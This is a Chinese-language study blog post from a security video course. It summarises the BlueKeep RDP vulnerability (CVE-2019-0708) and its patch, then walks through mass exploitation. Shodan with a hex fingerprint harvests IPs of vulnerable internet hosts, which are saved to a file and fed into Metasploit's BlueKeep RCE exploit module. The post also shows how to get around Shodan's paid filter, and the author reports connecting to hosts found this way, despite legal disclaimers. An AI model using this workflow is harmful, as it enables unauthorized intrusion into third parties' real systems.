声明:
学习视频来自B站up主 【泷羽sec】有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!
内容有误的地方欢迎各位大佬及时指正修改,虚心求教,共同进步!
有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec]
https://space.bilibili.com/350329294
目录
[一、CVE-2019-0708 漏洞介绍](#一、CVE-2019-0708 漏洞介绍)
这里特别提醒:下面所涉及的IP地址及信息仅供本人学习查看使用,其他均与本人及泷羽sec团队无关,请各位查看文章学习的同学们遵守国家法律法规切勿做出后悔终生的事情!遵守法律,爱国爱党!
先导
今天是学习如何批量查找cve-2019-0708的漏洞
一、CVE-2019-0708 漏洞介绍
概述
CVE-2019-0708,也被称为"BlueKeep",是一个严重的安全漏洞,存在于Microsoft Windows的远程桌面服务(Remote Desktop Services)中。该漏洞允许未授权的攻击者通过利用此漏洞执行任意代码,可能导致系统完全被控制。对该漏洞的严重性评估达到了"高度危急",并被微软归类为"外部远程代码执行漏洞"。
影响版本
受CVE-2019-0708漏洞影响的Windows版本包括:
- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows XP(在此特定情况下,支持的Windows XP版本中的MSI Remote Desktop Services)
漏洞性质
- 远程代码执行:攻击者通过发送特制的请求到目标系统的远程桌面服务执行任意代码,尤其是运行用户模式代码。
- 无身份验证攻击:攻击者不需要提供有效的凭证就能利用该漏洞,意味着在攻击者与受害者之间不需要建立交互或获取授权。
原理
CVE-2019-0708漏洞是由于远程桌面服务在处理RDP请求时存在输入验证缺陷。该漏洞允许攻击者通过发送一个精心构造的RDP请求使目标系统的内存出现溢出,并通过该内存溢出来执行恶意代码。一旦代码执行成功,攻击者就可以利用系统的权限进行任意操作,如安装恶意软件、查看和修改文件,甚至创建新的用户帐户。
具体的攻击流程如下:
- 发起连接:攻击者尝试连接到目标系统的RDP服务。
- 发送特制请求:通过发送特制的RDP协议数据包,攻击者可以触发内存溢出。
- 执行代码:由于漏洞的存在,攻击者能在受害者的系统上执行任意代码,并获取系统控制权。
攻击方式
攻击者可以使用特制的RDP请求攻击目标机器。一旦成功利用漏洞,攻击者就可以执行恶意代码,安装程序、查看、更改或删除数据,以及创建新帐户等。
解决方案
微软已经发布了针对CVE-2019-0708的安全补丁,解决了该漏洞。用户和系统管理员务必及时更新系统,确保安装了相关的安全补丁以防止潜在攻击。
- 补丁信息 :
- 对于Windows 7和Windows Server 2008,补丁在2019年5月14日发布。
- 对于不再积极支持的Windows XP,微软也推出了一些临时补丁,以帮助受影响用户。
风险与防护措施
- 使用防火墙:限制RDP访问,仅允许受信任的地址连接。
- 关闭远程桌面服务:如果不需要远程桌面功能,可以完全禁用服务。
- 强密码和多因素身份验证:确保远程桌面访问使用强密码策略,并启用多因素身份验证,提高访问安全性。
总结
CVE-2019-0708(BlueKeep)是一个严重的远程代码执行漏洞,可能导致全面的系统控制。用户和组织需及时采取措施,更新系统以防止潜在的安全威胁,特别是在利用此漏洞的恶意软件和攻击活动再度引发关注之后。保持系统安全更新和实施最佳安全实践是保护系统免受此类攻击的有效方式。
二、shodan批量查询cve-2019-0708漏洞
这里特别提醒:下面所涉及的IP地址及信息仅供本人学习查看使用,其他均与本人及泷羽sec团队无关,请各位查看文章学习的同学们遵守国家法律法规切勿做出后悔终生的事情!遵守法律,爱国爱党!
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
- 十六进制字符串(类似于指纹的方式去找)
- 上面这串字符串就是cve-2019-0708 的十六进制漏洞特征有漏洞不代表能利用
- 简单做了个尝试,发现可以连接成功!!
- 这个时候我们新建一个0708的文件夹把我们扫描出来的ip放进去
使用msfconsole进行批量漏洞利用
msfconsole
- 直接执行msfconsole命令来启动工具
-
这里版本不同可能启动后显示的图标也有所不同
search 0708
-
使用这条命令来打开我们的ip地址文件夹
-
返回的结果显示与 CVE-2019-0708 相关的模块,分别如下:
-
模块名称 :
auxiliary/scanner/rdp/cve_2019_0708_bluekeep
- 描述: CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
- 披露日期: 2019-05-14
- 优先级: normal(正常)
-
模块名称 :
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- 描述: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
- 披露日期: 2019-05-14
- 优先级: manual(需要手动操作)
-
模块名称 :
exploit/windows/browser/clear_quest_cqole
- 描述: IBM Rational ClearQuest CQOLE Remote Code Execution
- 披露日期: 2012-05-19
- 优先级: normal(正常)
-
模块名称 :
exploit/windows/browser/tumbleweed_filetransfer
- 描述: Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
- 披露日期: 2008-04-07
- 优先级: great(优良)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
-
-
通过这条命令进入到利用脚本程序
show options
- 输入命令 show options
set rhosts file:
- 通过这条命令来打开我们目标文件
- set rhosts file: 后面跟随文件路径,文件可以直接拖拽进来,自动识别路径
-
然后输入check命令
check
-
这里带【*】的代表漏洞利用失败
-
带【+】的代表漏洞利用成功
show targets
-
通过show targets可以看到能够适用的系统版本
parse(解析)和download(下载)参数使用
download命令
-
先查看一下download的帮助文档
-
命令如下
-
命令基本上和我们之前学习过的search命令差不多
shodan download -h
-
然后我们下载一下0708的这个漏洞信息
shodan download 0708 --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
parse命令
-
先看帮助文档
shodan parse -h
- --color :颜色加深
- --fields:过滤
- -0:名字
接下来开始解析我们刚刚的100条漏洞信息
shodan parse --fields ip_str /root/0708.json.gz
- 这里的文件路径我们还是可以通过拖拽的方式实现
-
我们可以看到已经解析成功了
-
接下来我们把它转化成txt的文档
shodan parse --fields ip_str /root/0708.json.gz >0708.txt
-
>0708.txt:加上这个后缀就可以转化为txt文档
关于shodan批量漏洞搜索的一个说明
-
本次我们搜索漏洞是通过下面这种方式实现的
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
-
那这里就有比较聪明的小伙伴问了如果我直接使用cve-2019-0708的方式能不能也做到批量搜索,答案是可以的
- 这里报错的原因是:这种搜索方式需要开通更高级的会员权限才可以,那我们就要学会通过绕过的方式去搜索,这也是一位学习红队该有的思想觉悟
- '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'通过这样的十六进制的指纹信息我们同样也可以做到漏洞搜索